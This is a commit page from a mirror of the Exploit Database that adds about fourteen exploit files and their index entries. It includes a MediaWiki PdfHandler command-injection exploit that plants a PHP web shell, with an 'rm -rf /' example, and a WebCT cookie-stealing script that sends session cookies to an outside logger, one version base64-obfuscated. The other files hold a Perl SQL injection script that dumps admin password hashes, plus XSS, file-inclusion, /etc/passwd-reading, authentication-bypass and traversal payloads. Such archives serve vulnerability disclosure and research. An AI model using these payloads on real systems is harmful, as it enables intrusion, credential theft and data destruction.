bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_03_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-03 04:26:33 +00:00
parent 890c901581
commit 8a34f6a372
15 changed files with 456 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -28135,3 +28135,17 @@ id,file,description,date,author,platform,type,port
31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0
31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0
31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x Login Page Cross-Site Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0
31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0
31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0

Can't render this file because it is too large.

16
platforms/bsd/dos/31333.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/28090/info
BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of the issue, arbitrary code execution may also be possible, but this has not been confirmed.
This issue affects FreeBSD 6.3 and unspecified versions of NetBSD and OpenBSD; other versions may also be affected.
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx

9
platforms/hardware/remote/31340.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28116/info
Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x.
<html> <body onload="document.f.submit()"> <form name="f" method="post" action="http://192.168.10.1" style="display:none"> <input name="user" value="'<script/src=//l7.fi></script>"> </form> </body> </html>

14
platforms/hardware/remote/31342.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/28122/info
Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.
An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1

183
platforms/multiple/webapps/31329..txt Executable file
View file

@ -0,0 +1,183 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Points Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################
# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"<?php%20system(\\$_GET[1]);">images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!
# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php
# Vulnerability Analysis:
####################################################################
1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
<? ...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();
1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
$params = get_magic_quotes_gpc()
? array_map( 'stripslashes', $_GET )
: $_GET; << WTF
wfStreamThumb( $params ); // stream the thumbnail
}
1.3 Stream a thumbnail specified by parameters
function wfStreamThumb( array $params ) {
...
$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts
uploaded.pdf file here
...
// Backwards compatibility parameters
if ( isset( $params['w'] ) ) {
$params['width'] = $params['w']; // << Inject os cmd here!
unset( $params['w'] );
}
...
$img = wfLocalFile( $fileName );
...
// Thumbnail isn't already there, so create the new thumbnail...
$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image
by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
...
?>
2. /includes/filerepo/file/File.php
<? ...
function transform( $params, $flags = 0 ) { ...
$handler = $this->getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
...
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
<? ...
function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
...
$width = $params['width'];
...
$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &
parameters
$cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}
-dLastPage={$page}";
$cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg(
$srcPath );
$cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
$cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell
argument
$cmd .= wfEscapeShellArg( $dstPath ) . ")";
$cmd .= " 2>&1";
...
$err = wfShellExec( $cmd, $retval );
...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
<? ...
function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =
array() ) {
...
passthru( $cmd, $retval ); // << Execute here!!
# Proof-Of-Concept
####################################################################
GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C
php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`
HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;
my_wiki_session=op3h2huvddnmg7gji0pscfsg02
<html><head><title>Error generating thumbnail</title></head>
<body>
<h1>Error generating thumbnail</h1>
<p>
?????????????????????????????: /bin/bash: -: command not found<br />
convert: option requires an argument `-resize' @
error/convert.c/ConvertImageCommand/2380.<br />
GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
</p>
</body>
</html>
GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Back-end $cmd
####################################################################
GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/usr/bin/convert' -depth 8 -resize 10|`echo "<?php
system(\\$_GET[1]);">images/longcat.php` -
'/tmp/transform_0e377aad0e27-1.jpg') 2>&1
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)
iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
=ooEs
-----END PGP SIGNATURE-----

7
platforms/php/webapps/31331.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28088/info
The eGallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

7
platforms/php/webapps/31332.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28089/info
The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

7
platforms/php/webapps/31334.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28096/info
Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen--

7
platforms/php/webapps/31335.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28098/info
MG2 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

9
platforms/php/webapps/31336.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28106/info
Podcast Generator is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Podcast Generator 0.96.2 is vulnerable; other versions may also be affected.
http://www.example.com/podcastgen-0.96.2/setup/set_permissions.php?scriptlang="><script>alert("XSS")</script

95
platforms/php/webapps/31337.txt Executable file
View file

@ -0,0 +1,95 @@
source: http://www.securityfocus.com/bid/28107/info
WebCT is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects WebCT 4.1.5.8; other versions may also be vulnerable.
WebCT 4.x Javascript Session Stealer Exploits
Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
Affected Version: 4.1.5.8
Discoverer: Benjamin "balupton" Lupton
Date Discovered: November 2005
Date Reported: 25/06/2007
Software Author Contacted (again) on: 20/07/2007
Date Published: 05/03/2008
Published At:
http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
http://www.balupton.com/documents/webct_exploits.txt
http://seclists.org/fulldisclosure/2008/Mar/0051.html
Attack Type:
Javascript Session Stealer Exploit.
Description:
Mail & Discussion Board messages are not properly checked for javascript, allowing javascript to perform a session stealing attack (allowing the attacker to be logged in as the victim).
Tested On:
Attacks were tested fully on eCentral TAFE&#039;s WebCT System in November 2005 (with permission of staff),
and again on Curtin University&#039;s WebCT System in June 2006 (but this time only to see if the javascript will run).
Action Taken:
Contacted TAFE lecturers and administrators, who didn&#039;t really care.
Contacted WestOne multiple times, but never recieved any response.
Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question.
Published as WebCT is being phased out, with Blackboard being the replacement.
Steps:
The attacker publishes the exploit code in a message with "Don&#039;t wrap text" enabled.
The victim accesses the attacker&#039;s message and their cookies are sent to the attacker&#039;s remote logger.
The attacker then logs into the system and replaces his/her cookies with the acquired cookies.
- Cookies are formatted as follows within the "value" attribute: CookieName=CookieValue; NextCookieName=NextCookieValue;
The attacker is now logged into the system as the victim.
In this case the logger is located here: http://www.balupton.com/sandbox/logger.php?pass_code=secret_key
Notes:
Victims must be students (attack does not work on non students, eg. teachers/admins).
Attack 2 will also run in Opera, but fails to retrieve the document.cookie value.
Attack 2 uses a base64 encoded javascript which is executed.
Both attacks can be customized to allow any javascript to run.
Javascript can also be developed to post a mail or discussion board message, this works for all types of victims.
Resources:
Attack Code: See below
Logger: http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_source=true
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In
Attack 1 - IE6SP2 Exploit (Automatic):
<div id="mycode" style="BACKGROUND: url(&#039;java
script:eval(document.all.mycode.expr)&#039;)" expr="// balupton&#039;s javascript session stealer automatic hack
var iframe = document.createElement(&#039;iframe&#039;);
iframe.style.border = &#039;none&#039;;
iframe.style.height = &#039;1px&#039;;
iframe.style.width = &#039;1px&#039;;
var url =
&#039;http&#039;+&#039;://www.balupton.com/sandbox/logger.php&#039;
+&#039;?variable=document.cookie&#039;
+&#039;&value=&#039;+escape(document.cookie)
+&#039;&url=&#039;+escape(document.location)
+&#039;&pass_code=secret_key&#039;
;
iframe.src = url;
document.body.appendChild(iframe);">Thank you</div>
Attack 2 - Firefox Exploit (Manual):
<a href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8gYmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVybCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVycmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9rZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>
Attack 2 - Firefox Exploit (Manual) - Decoded:
<script type="text/javascript">
// balupton&#039;s javascript session stealer manual hack
var url =
&#039;http://www.balupton.com/sandbox/logger.php&#039;
+&#039;?variable=document.cookie&#039;
+&#039;&value=&#039;+escape(document.cookie)
+&#039;&url=&#039;+escape(document.referrer ? document.referrer : &#039;http://exploited_url.com&#039;)
+&#039;&pass_code=secret_key&#039;
;
document.location = url;
</script>

10
platforms/php/webapps/31339.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28109/info
The Yellow_Pages module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects the Yellow_Pages 1; other versions may also be vulnerable.
http://www.example.com/modules.php?name=Yellow_Pages&file=viewdir&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

9
platforms/php/webapps/31341.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28120/info
Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions prior to Yap Blog 1.1.1 are vulnerable.
http://www.example.com/[path]/index.php?page=[Sh3llAddress]

60
platforms/php/webapps/31344.pl Executable file
View file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/28126/info
The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl use Getopt::Std;
use LWP::UserAgent;
sub usg{
printf("
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
| PHP-NUKE KutubiSitte [kid] => SQL Injection |
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
#######################################################
# Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
#######################################################
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| USAGE: |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#| EXAMPLE: |#:
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
");
}
sub problem{
print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
exit();
}
sub exploitation{
$conn = LWP::UserAgent -> new;
$conn->agent('Checkbot/0.4 ');
$query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%
2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
$return_pwd = $conn->get($query_pwd) || problem();
$return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
}
getopts(":h:p:U:",\%args);
$host = $args{h} if (defined $args{h});
$path = $args{p} if (defined $args{p});
$user_id= $args{U}if (defined $args{U});
if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
usg();
}
else{
exploitation();
}

9
platforms/windows/remote/31345.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28127/info
MicroWorld eScan Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the FTP server root directory. This can expose sensitive information that could help the attacker launch further attacks.
eScan Server 9.0.742.98 is vulnerable to this issue; other versions may also be affected.
ftp://SERVER:2021//windows/win.ini